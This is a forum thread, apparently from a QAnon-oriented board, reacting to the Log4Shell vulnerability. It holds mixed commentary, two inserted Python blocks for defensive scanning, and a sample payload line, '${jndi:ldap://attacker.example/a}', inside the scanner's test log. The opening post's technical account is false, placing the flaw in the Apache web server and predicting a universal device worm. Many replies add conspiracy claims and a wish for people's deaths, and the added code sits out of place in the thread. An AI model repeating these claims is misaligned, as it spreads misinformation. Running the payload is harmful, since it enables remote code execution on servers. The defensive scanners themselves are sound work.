Hey there everyone, your friendly neighborhood tech pede here. Not sure how much attention people here pay to tech news but over the past two days there has been a bit of info that's been trickling into even some mainstream news sites about a recently discovered vulnerability called Log4Shell. These sites have been saying how this vulnerability has the potential to be pretty bad. As a guy that's worked in tech for pretty much all my life, let me rephrase that for them. This vulnerability has the potential to be catastrophic.
I work in the civ, non-gov't sector and I have more NDAs signed than I can count so I can't go into specifics of clients or ongoing cases that we're involved in. But we see cases come in where massive companies get their data stolen and ransomed for millions and no one at my work really thinks twice about it because we work with this stuff every day. But this one has us all worried.
What is this vulnerability?
There's a couple of jargon-filled writeups here:
But long story short, in order for a website or service to be accessible via the Internet, it needs a web server in place. The most widely used one of these is a web server called Apache that's been around for about 25 years. Every web server (and really any application on a computer) keeps a log of everything that it does in order to track errors, see unauthorized access, that kind of thing. This exploit specifically targets this built-in logging feature in Apache in order to gain full access to the web server and drop pretty much anything it wants on it.
So how bad is it?
Bad. Really, really bad. Bad enough that as soon as it was released, it immediately hit the ceiling as a 10.0 out of 10.0 on the CVE index and that was only because the index didn't go higher. For reference, the HAFNIUM exploits from this past February/March that caused hundreds of thousands of mail servers across the globe to have their data stolen and their systems crashed didn't even reach that mark, with most of the affected CVEs for that exploit coming in at 7.8.
Unlike the HAFNIUM exploit, this vulnerability appears to have the potential to be a C2C (computer to computer) worm, which means that once it's infected a web server it can spread uncontrolled to basically any device connected to that web server.
So it only affects these web servers, right?
Not necessarily. Evidence is still coming out but it appears as though this may be able to spread to any device that communicates with an Apache-based web server. The biggest example right now is Minecraft, which released a zero-day patch just yesterday to help protect against this. Basically if you don't have that patch then if you connect to a multiplayer server then you're vulnerable.
But it's not just services like Minecraft. A lot of applications also have what's referred to as integrated web servers, which is where the Apache web server does not exist independently of the application. If it were to be independent, then you could just patch the web server and call it a day. But if it's integrated you need to re-code portions of the ENTIRE application in order to get it updated to protect against this. There's not enough manpower in the world to do this.
Look at the numbers of just websites running Apache alone. There are over 1.7 billion websites in the world and about 32% are known to run Apache. The actual number is most certainly higher. Even in a best-case scenario, we're looking at over 500 million websites that are affected by this.
But again, it's not just websites, it's services as well...especially services that run on Java. You know that fancy satellite radio in your car? That runs on Java and reports to a web server. You know that new TV you got on Black Friday? Yep, that runs Java and reports to a web server. That fancy new smart plug that lets you turn lights on and off from your phone? Take a guess.
Seeing why we're worried?
Well, crap.
Don't worry, it gets worse! So far there has been a list of about 150 international backbone companies that have been seen to be affected by this. These companies range from home devices to antivirus and backup software. Some companies such as Kronos (UKG) have already had their services nuked...whether it's by this vulnerability or not isn't known yet. But Kronos is saying that it will be "several weeks" before things are back functioning again.
https://www.theregister.com/2021/12/13/ultimate_kronos_group_ransomware_attack/
So once this hits a server, it hits FAST and it hits HARD and it goes DOWN.
So these attacks are already happening?
They haven't even really started, that's the fun part. There has been some evidence that these have been circulating to some extent in the wild but there hasn't been a mass-scale attack like we've usually seen. Current insiders are estimating that a worm that can fully take advantage of this C2C spread will be completed and deployed within 24-48 hours:
https://nitter.net/Laughing_Mantis/status/1470165580736987137
So what should I do?
If you're in tech, get your Apache web servers updated immediately. Get off this site and just do it. If you have kids that are running a Minecraft server (hell, just even playing Minecraft on PC in general) then make sure it's updated. Microsoft has more info here:
https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
If you're just a regular tech user then make sure you have a few good, long books just in case things go FUBAR. And strap the fuck in.
Somedays I feel like the Violinist on the Titanic. Just playing along as the ship sinks and slowly starts breaking apart.
Whatever happens. Gentlemen, it's been a privilege memeing with you.
So I guess this means we are going back to the 1880's whether we want to or not.
Ha lol I have the lamps but no typewriter, dang!
Dang it! I COMPLETELY forgot about a typewriter so I can start writing my memoirs during the cyber apocalypse!
pen & paper also work. ....Or pencil I suppose
typewriter memes
good luck finding ink ribbons!
I have a re-inker and a huge bottle of ink. It works for typewriter ribbons as well as old dot matrix printer ribbons. In fact it was actually designed for the printer ribbons.
Amazon has new ribbons, and they aren't super expensive. Just google "typewriter ribbons."
Ha lol, dot matrix. Say that to anyone 30 or under and watch their face.
I keep all the old tech as it may come in handy someday. It doesn't cost me anything to keep it, but my home office looks like a hoarder's home.
And you probably have your own order in chaos, lol, talking about a specific mindset...
Just remember when you're buying a kerosene lamp to get one with the safety valve so they don't explode and set fire to your house :-)
Standard old-fashioned kerosene lamps don't explode. They aren't enclosed tightly in any way. There is a glass container to hold the kerosene. There is a metal wick holder on top of that. The wick sticks through that down into the kerosene. There is an adjusting knob to raise and lower the wick. Nothing is sealed. Then there is a glass shade to block drafts and allow the light to shine out.
I have been around kerosene lamps my whole life. I'm looking at three across the room from me right now.
Here's one for just $5.99: https://www.hobbylobby.com/Home-Decor-Frames/Candles-Fragrance/Diffusers-Oils/Oil-Lamplight/p/80645858
One thing you might consider is getting lamp oil instead of kerosene, especially if you have respiratory problems and plan on using one a lot. My plan, if things go south, is to go to bed when it gets dark and get up when it gets light. That dispenses with the need for much lighting. Candles will be sufficient then.
Thank you, I do have lamp oil, plus lots of wick. I have several of the old glass oil lamps, fitting since I live in an old farmhouse.
I have something like that. It still has an outhouse in the back yard. A neighbor still has a pitcher pump in their back yard. I think my area will be fine.
I asked the well guy to put in a hand pump; he just laughed at me.
More like 8 thousand BC. Yep more like that.
When you build a system that can be easily destroyed. It gets destroyed.
Why that far back? Our minds and human positive ingenuity will still be intact. Please, we have the knowledge and we can overcome adversity; we just need new and better ways to achieve without the chains of corrupt government binding us.
^^ THIS. ^^ Touché
The meme will be with you, always
NEVER LET GO!
Wow, that's a visual I totally understand.
Lmfao bro I've been saying that to the fam and friends lately hahaha great minds think alike. And at least we are fighting and standing our ground. Not asleep sheeple
Wish I could updoot This ^ X 100
Best advice evar: just stop care
They can't hack or disable my mountain bikes! Bwa ha ha ha
BAM! That's the key alright!
The vulnerability is in log4j, not the apache web server. This is a completely separate project also developed by the Apache foundation. It is a Java logging library, and is not used in the apache web server, which is written in C.
It's still a big deal and log4j is very widely used, but to say the web server itself is vulnerable is not true.
I concur with your statement: log4j is a separate Apache project from their very popular web server.
Would be funny if this was true and the ops thing was hyperbole.
This is correct. Log4j is a library used in Java-based platforms that run on Apache. Not all Java platforms use this library, although it is very popular.
It doesn't need to run on apache (which would be something like Apache Tomcat rather than the web server). It's a standalone library, a service could be vulnerable regardless of its hosting platform.
The information I am getting from Infor, which is the product that I consult on, seems to be deleting the log4j*.jar files.
Infor indicates that version 1 files are not affected by this issue. Although there is a vulnerability in version 1 files:
"Affected Versions of Log4J - Any Log4J version prior to v2.15.0 is affected by this specific issue. The version 1 branch of Log4J is vulnerable to other RCE attacks and should be updated."
The part in bold ONLY applies to log4j V2. We run log4j V1. V1 IS NOT AFFECTED BY THIS SPECIFIC ISSUE.
A known vulnerability in v1 - https://logging.apache.org/log4j/1.2/ only applies to the log4j socket server, which we do not use.
From what I could tell it wasn't a web server thing unless the project included log4j. So it may or may not be used based on what modules are on or plug-ins enabled. I think Minecraft does have it for sure but I'm optimistic about Apache
It's the message lookup feature in log4j that is the culprit. It's the built-in JndiLookup plugin, which is enabled by default. The message lookup was a bad idea that has other issues besides the one reported. 2.15.0 updates the configuration to disable all message lookups (which is what it should have been). Many companies don't keep up with JDK updates (which disabled this from working a while ago, since it relied on the ability to execute remote code over LDAP/RMI).
And those talking down about this have no idea how many mega-corp level services/site are vulnerable. It may not be in apache itself, but it's in one of the most common packages used with said server.
Apache HTTP server and log4j do not mix at all. log4j is used with Java based web application servers (e.g. Tomcat, Jetty, WebLogic, etc.). Apache is an open source organization that contributes to C, C++, Java based projects. Apache HTTP server is used to distribute content and/or centralize auth/security type settings. It's possible to host directly from a Java web application server but most big corps don't.
log4j is used in a lot of places because overall it's a high quality library. This is a big black eye for them due to feature creep IMO. I work in security and even this caught me by surprise. In retrospect I'm shocked this wasn't caught earlier but it's been out in the open for years. Like I said before though, to be successful it depends on a foundation that has been fixed for a while, so shame on companies for being too lazy to keep up with security patches in the OS or Java layers.
Good point. We have our own base servers, but almost everything uses some form of apache libraries. And Log4j-core
As a contractor/consultant, I can confirm most organizations are very far behind in their security updates in general. Newer projects get the newer JDK's usually, and the larger the company, the more likely they have a lot of out-of-date software.
Although there are many reasons for this, the largest I have come across is that most organizations don't have enough knowledge of their full runtime environments to confidently make changes, even security updates of this nature. In many cases, systems are inherited by new people after old people leave, and there is a lot of fear to make changes since a lot of developers I have worked with fail to try to fully understand the product and code they're working on.
The upside is that vulnerabilities that get mass media attention, like this, are usually an exception to the norm and they will attempt to discover and fix the problem as quickly as they can.
And even when you do an audit, you focus on libraries core to function, and going through code of what are clearly ancillary libraries like 'logging' that have been running reliably for years with zero modifications by your crew sounds silly. It's totally understandable.
No apache httpd modules will use log4j, it's a Java library and would be in Java bytecode while apache modules are native executable (e.g. ELF binary in Linux).
Server-side Java applications could be vulnerable. These will typically run in a servlet container such as Apache Tomcat or JBoss and may be served via apache httpd either in a reverse proxy configuration or with mod_jk. So you need to go a bit deeper than a basic Apache httpd + plugins configuration to encounter the vulnerability.
That's still a very use case and is a Really Big Deal, but not as bad as something that would affect all Apache httpd installations. Go back a few years to Heartbleed if you want to see what that looks like.
I get some sick pleasure that this came from the java world...
Me too. Sorry not sorry.
u/#q332
Strange timing given GME is at its lowest point since last February. Clearly a HUGE attack from the hedgies.
Coordinated effort to keep people from selling when the collapse begins?
My first thought seeing this post was "is my GME gonna be okay?" I love my shares as if they were my children
Did you direct register? There was a nice AMA with one of the senior folks at Computershare who explained that you can easily sell at market value through them. No need to transfer shares back to a broker.
I'm getting the corn oil heated up to fry some fuckin TENDIES man
why cant i see this post?
Well that was an interesting read. I suspected the internet was a target as soon as they began planting seeds about "internet apocalypse'
Yup! Just like the "pandemic". I'm so over Klaus Schwab and his evil minions. I know I'm supposed to say "may God have mercy on their souls" but really all I can think is "may they die a thousand deaths, be shown no mercy, and burn in the Lake of Fire for all eternity".
Yes! If the world uniting against pedophilia, child trafficking, etc., is ultimately what ushers in the Anti-Christ and judgement, then I say bring it on b/c that's the hill I will stand upon to die if I have to. God's judgement and the Lake of Fire will be for the wicked and not the righteous that stood up for the most helpless and innocent among us. And once you know about the children it's kind of hard not to believe in judgement day and hell and heaven. There has to be some kind of eternal anguish for people who commit such evil.
I just want the fleas of a thousand camels to infest KS, GS, Fraudci, BG, and all their minions right where it counts!
Q mentioned Apache several times.
#646 is just "Apache".
Lol
I love learning something new everyday! You are a teacher. Thanks for the clear information.
Didn't Archbishop Vigano, in his latest vid a few weeks back, say the next crisis after covid would be an internet crisis?
Maybe after that food?
I'll have to re-watch it. Just off the top of my head it sounds familiar from watching his video a while back.
Correct, he mentioned an "internet emergency".
https://rumble.com/vpelhb-breaking-exclusive-archbishop-vigano-appeals-for-a-worldwide-anti-globalist.html
I was looking through the details of this today, while applying a mind-numbing number of patches (I work at a massive Corp which everyone knows, so I can't dox myself) ... it looks so damned simple that I can't help but wonder if it was designed this way, and kept hidden for 20+ years for the right moment ... just doesn't look like your typical mistake/oversight-caused vulnerability.
And I have some sneaking suspicions that last week several large-scale penetrations were the reason this was "found" just now .... the damage/operations are already complete.
I need to go back and read the Q posts re: some of those esoteric execution codes. I think some may make sense now ....
I'm 57. I remember the world before the internet and cell phones. The good ole days when a lie took longer to spread than it did to die off. We'll be fine either way this goes. Not worried one damned bit.
Will this result in comms going down and the dark winter?
Recently I've been pirating all the decent movies over the last few decades to create a decent movie catalogue, why? Cause fuck em that's why.
I hope my Plex server which I keep pressing remind me later on when it asks me to update it, running 24/7 on my Mac Mini M1, won't be my downfall.
Good thing is I got rid of my bank account in February, why? Cause fuck em that's why.
Y2K has entered the chat
I'm a bit techie dumb so sorry for the question in advance. I am on disability and my bank is Direct Express - I use/access it online. My question is can this affect Social Security, I mean their means of getting funds into bank accounts? Can this affect any bank, any business?
I'm not particularly tech savvy, but this kind of thing could definitely affect online banking if the problems become widespread. And ATMs and brick-and-mortar banks as well.
I don't mean to sound any alarms, as no-one really knows what's happening, but I definitely sleep better because I have some cash at hand, enough to buy food for several weeks. And I highly recommend having cash. And gold and silver for longer term protection against when shtf.
I have been buying non-perishable food and stocking up just in case things go down for awhile. It might not be a bad idea for you to do the same. That way you will have food and water if the grid goes down for a bit
Theoretically, yes, but things like this take time to fully take advantage of. Also, threats of this caliber tend to evoke a quick response from tech teams.
I work for a bank, and here's the response we got from the folks that handle the "backend system" - without naming names. They run the backend for a lot of banks. From what I can gather, as far as a bank receiving the funds, shouldn't be an issue - if it is it won't be for long. Hopefully SSA updates any Apache servers they may be running, if any.
"At this time, we have not detected any suspicious activity in our environment as a result of this worldwide vulnerability. In addition to the remediation described above, [company] deploys layered controls to protect against new vulnerability exploits. This includes endpoint detection and response, which makes it more difficult to successfully leverage such a vulnerability, and robust monitoring of and response to anomalous actions on our systems that are likely to follow such a vulnerability exploit."
Who runs the backend?
They may own you, but not me.
Based
I'm not owned by anyone, however I'm in human society as it is currently just as millions of others are so if that's your definition of "owned" then yes, however that's why I'm here but I'm also wide awake unlike some.
369Q is just being blunt but very honest. We have known, if anyone has been watching and listening, to prepare for just about anything, and that means ANYTHING!
Thanks for the tldr fren.
Reminds me of a late night infomercial.
"But don't worry! It gets worse!"
"Did you think that was all you would get? No, no, no! It gets even worse!"
The patch is probably remdesivir or some bullshit they're force feeding onto poor unsuspecting IT dipshits
Been working through this for two days straight now. OP is not kidding. Been in tech for many years. This is by far the worst vulnerability ever seen. Great write up OP.
I think the one point left out here is the spray factor of this vulnerability. Sometimes you have really bad vulnerabilities, but they are really hard to execute. This one, targeting an apache web server, you could just run a script inserting the exploit into the user agent of a standard http request, and boom you have full control of the server, and anything beyond that. This could be sprayed across thousands of sites at a time en masse. So easy to find a vulnerable system, then even easier to exploit it.
This is one for the history books...
The turmoil has not started yet.
Winter is coming....
Then I shall ski.... in the shade.
Kek!
I am ready. Let's gooooo!
I know right?
I'm laughing so hard, that my tears are salting my popcorn!
Especially with this (linked above):
u/#q332
I am so glad none of my guns have computers in them.
10 days ....
Oh geez! Excellent point.
I'm a bit of a dumbass tech-wise, but yesterday I saw on the news that about 4000 government websites had to be shut down (in Quebec) for major security vulnerabilities; might be linked
Thank you for the heads up! I'm not very tech savvy. Should I be concerned about my son playing games like Fortnite or Roblox? Is it best to just stay away from these sites until the issue can be fully resolved?
The exploit depends on a number of factors including which version of Java is hosting the web application, how open egress on the network is, and whether you are using the default configuration. Basically if the host is running old versions of Java with a wide open network they are at risk. Also they must ignore best programming practices and log user input as-is (which unfortunately a lot of devs do).
Best practice is to sanitize untrusted user input before operation on it (including logging). The fact that log4j has a message lookup feature which is enabled by default was an incredibly stupid design decision, but this mistake has been made before by others and it's been open source forever and nobody caught it (or kept quiet about it anyway).
"sanitize untrusted user input before operation on it"
https://bobby-tables.com/img/xkcd.png
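As an added example, not code from any commenter here, a Python sketch of the two defensive moves the comment above describes: a scanner that runs over constructed web-server access-log lines and flags lookup syntax in the fields applications tend to log verbatim (request line, referer, User-Agent), and a small neutraliser for code that must still log untrusted text behind an unpatched log4j. The log lines, IP addresses and the attacker.example host are constructed; the function and field names are my own.

```python
import re
from dataclasses import dataclass
from typing import List

# Log4j 2 message lookups use the form "${name:argument}". Until 2.15.0 the
# JndiLookup plugin resolved "${jndi:...}" inside message text, so any
# untrusted string that reached a log call was interpreted, not just stored.
LOOKUP_OPEN = re.compile(r"\$\{")
JNDI_TOKEN = re.compile(r"jndi\s*:", re.IGNORECASE)

# Combined log format: ip ident user [ts] "request" status bytes "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The client controls all three of these; they are what gets logged as-is.
LOGGED_FIELDS = ("request", "referer", "ua")


@dataclass
class Finding:
    line_no: int
    field: str   # which logged field carried the lookup
    kind: str    # "jndi" for the JNDI lookup, "lookup" for any other ${...}
    snippet: str


def scan_access_log(lines: List[str]) -> List[Finding]:
    """Flag access-log records whose client-controlled fields contain
    log4j lookup syntax. Nested forms ("${${...}...}") still start with
    "${", so matching the opening token is enough to raise a finding."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        m = COMBINED.match(line)
        if not m:
            continue  # not a combined-format record; a real tool would count these
        for field in LOGGED_FIELDS:
            value = m.group(field)
            if LOOKUP_OPEN.search(value):
                kind = "jndi" if JNDI_TOKEN.search(value) else "lookup"
                findings.append(Finding(n, field, kind, value[:80]))
    return findings


def neutralize_lookups(untrusted: str) -> str:
    """Defense in depth for an application that must log untrusted text
    while it still runs an affected log4j: break the "${" opening token so
    the string can no longer be parsed as a lookup. Upgrading log4j (or
    removing the JndiLookup class) is the fix; this only narrows exposure."""
    return untrusted.replace("${", "[dollar]{")


# Constructed sample records (not real traffic). Records 2 and 4 carry lookup
# syntax in the User-Agent and the request line respectively.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:00:03 +0000] "GET /login?user=alice HTTP/1.1" '
    '200 128 "-" "curl/7.68.0"',
    '198.51.100.2 - - [10/Dec/2021:10:00:04 +0000] "GET /search?q=${env:HOME} HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"record {f.line_no}: {f.kind} lookup in {f.field}: {f.snippet}")
    print(neutralize_lookups("${jndi:ldap://attacker.example/a}"))
```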
My team is scrambling to fix this right now on our servers. This vulnerability is particularly nasty because even if you don't use Log4J directly, it often shows up as a transitive dependency so you have to update everything. Java has 20% "marketshare" and web servers probably use it at an even greater rate. So this leaves up to 50% of Internet servers with a major vulnerability.
I have 3 teams using this particular library, and they are updating it to the newest patched version. Nobody (including my CISO) seems to be terribly worried about the difficulty in patching.
Excluding a dep isn't hard by itself, but that makes it easy for it to slip by.
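Added example (my own Python, not code from any commenter or from the log4j project) that ties together the JndiLookup comment earlier in the thread and the transitive-dependency point here: an inventory scanner that recurses into nested archives, records each log4j-core copy it finds, and reports whether the JndiLookup class is present and the declared version is below the 2.15.0 threshold quoted in this thread. The fat jar it scans is constructed in memory; the BOOT-INF/lib path and com/example names are illustrative.

```python
import io
import re
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional, Tuple

# The class behind the "${jndi:...}" lookup and the Maven metadata that
# log4j-core ships with; both are ordinary zip entries inside the jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_IN = (2, 15, 0)  # the thread's threshold: anything earlier is affected
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Hit:
    location: str                       # outer file, then nested entries joined by "!/"
    version: Optional[Tuple[int, ...]]  # from pom.properties, None if absent
    has_jndi_lookup: bool

    @property
    def vulnerable(self) -> bool:
        # A copy whose JndiLookup class was deleted (the published workaround
        # for jars that cannot be upgraded yet) cannot resolve ${jndi:...}.
        if not self.has_jndi_lookup:
            return False
        # Unknown version with the class present is treated as affected.
        return self.version is None or self.version < FIXED_IN


def parse_version(props: str) -> Optional[Tuple[int, ...]]:
    """Pull "version=2.14.1" out of a Maven pom.properties body."""
    for line in props.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            m = re.match(r"(\d+)\.(\d+)\.(\d+)", value.strip())
            if m:
                return tuple(int(x) for x in m.groups())
    return None


def inspect_archive(data: bytes, location: str) -> List[Hit]:
    """Report log4j-core copies in an archive, recursing into nested jars
    (fat jars, WAR WEB-INF/lib, EARs) where transitive dependencies live."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []
    names = set(zf.namelist())
    hits: List[Hit] = []
    if JNDI_CLASS in names or POM_PROPS in names:
        version = None
        if POM_PROPS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        hits.append(Hit(location, version, JNDI_CLASS in names))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            hits.extend(inspect_archive(zf.read(name), f"{location}!/{name}"))
    return hits


def scan_tree(root: Path) -> List[Hit]:
    """Walk a deployment directory and inspect every archive in it."""
    hits: List[Hit] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            hits.extend(inspect_archive(path.read_bytes(), str(path)))
    return hits


def build_sample_app(core_version: str, keep_jndi_class: bool = True) -> bytes:
    """Constructed fat jar: an application that bundles log4j-core as a
    nested dependency. Class entries hold placeholder bytes, not bytecode."""
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as z:
        if keep_jndi_class:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        z.writestr(POM_PROPS, f"version={core_version}\nartifactId=log4j-core\n")
    app = io.BytesIO()
    with zipfile.ZipFile(app, "w") as z:
        z.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        z.writestr(f"BOOT-INF/lib/log4j-core-{core_version}.jar", core.getvalue())
    return app.getvalue()


if __name__ == "__main__":
    for hit in inspect_archive(build_sample_app("2.14.1"), "app.jar"):
        print(hit.location, hit.version, "VULNERABLE" if hit.vulnerable else "ok")
```

Point scan_tree at a real deployment directory to get the same report for every archive under it.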
All depends. Nothing I've ever worked on has used Java. I always tried to stay away from it, but some internal tools have used it. I've done webdev/sys admin/devop stuff for years.
I do have internal things that use it, or have used it, in the past tho. Wonder if these vulns have something to do with election stealing. Anything public facing could be vulnerable. Could all be a message from WH to let people know they know about it.
I'm personally wondering if I can hack some of my old devices, like the TV or vacuum. I'm just weird like that tho
Totally. My guess is 99% of servers will be fine in the end because it's an easy upgrade
By the time we know it, the operatives have been in and out, taken what they need, and made commemorative T-Shirts.
The important stuff is already done. This is to let EVERYONE know where they were, and to smoke people out ... turn state's evidence, squeal on their partners-in-crime, etc
Really happy my company is full Microsoft .NET stack right now, haha
Comment from impera
https://www.lunasec.io/docs/blog/log4j-zero-day/
in this thread
https://greatawakening.win/p/140cWrLdlI/massive-hacker-war-targeting-ser/c/
Dutch broadcaster warns of impending chaos
https://nos.nl/artikel/2409383-stilte-voor-de-storm-door-groot-beveiligingsprobleem-dit-gaat-niet-met-een-sisser-aflopen
What about saved offline stuff, like e-books, videos and single player video games. Would they run like normal ?
Saved offline stuff would be good. The only exceptions may be single player games that connect to web services in order to prove they're legit copies. Think stuff like Cyberpunk or whatever. There's a couple hints that Steam may be affected but again, info is still being discovered.
The main concern is that if there's a way for this to spread to your PC through a Java program that connects to an affected server (like they're trying to prevent with Minecraft), then your PC could get encrypted with ransomware or be used to propagate the worm to other computers.
In this case, I think I can say I'm ready. Stay safe.
Tbh, don't worry about it. Minecraft's being used as an example because it's built on old Java code.
I'm long out of "the field" but this, as usual, is a server side problem more than a personal computing one. Java and JavaScript are two entirely different things. The fact you asked the question leads me to believe you're probably not running anything relevant on your PC.
To the neck beards: I know I'm oversimplifying and misrepresenting the essential underlying truth with the above. A "heads up, Shit Could Hit the Fan globally" is fine, but we don't need to be scaring old ladies.
(Not calling anyone an old lady!)
This comment cracked me up so hard. dies. People around me in the coffeeshop now think I may be epileptic.
Omg!! Rooftop, I'm dying! Please don't ever change! So glad you took the red pill and joined the based ranks!
Ha lol that's the best one yet!
Ahaha I'm only 33 but feel like an old lady when I read this post. I told my husband he would have to summarize. He told me my phone would be fine
I'm an old lady and Dang proud of my 60 yrs! I've been through personal world wars to say the least; my real age by life may be 259
Hahaha. Uproots for all the neck beards.
Consoles affected? Ps4- Xbox kinda deals.
Hard copy all you can anons. SHTF all around us.
You convinced me. Just blocked all my backups from touching the internet.
Ok. So what you're saying is I need to buy some 20lb reams from Dunder Mifflin or the Michael Scott Paper Company and pick up some old filing cabinets?
Post #666
Feb 5 2018 12:16:50 (EST)
Why did the #Memo drop a Friday [& before the SB]?
Did this seem strange to you?
Watch the news.
Rothschild estate sale [Black Forest].
Stock market DIVE [666 - coincidence?].
Soros transfer of wealth.
Dopey FREED.
Marriage for POWER, not LOVE.
Hilton/Roth.
Soros/Clinton.
Etc.
News unlocks MAP.
Think Mirror.
Which team?
THEY don't know.
APACHE.
These people are EVIL.
Still don't believe you are SHEEP to them?
20/20 coming.
PUBLIC is VITAL.
RELEASE of INFO VITAL.
OUTRAGE.
JUSTICE.
Can we simply arrest the opposition w/o first exposing the TRUTH?
FOLLOW THE LIGHT.
Q
So it's an internet version of COVID (If COVID were that deadly) i.e. spreads from web to web via connections ?
It gets ever worse because now we know that the vulnerability has been known for a long time and that even government agencies have used the exploit.
The fact that Alibaba Cloud are the ones who reported the vulnerability tells us that either A. Alibaba runs a better cloud environment than even that of Microsoft or Amazon, or they are rogue actors.
The plus side to all of this is that none of SolarWinds' products have this vulnerability because a part of this exploit was used during the last attack, so they were better prepared.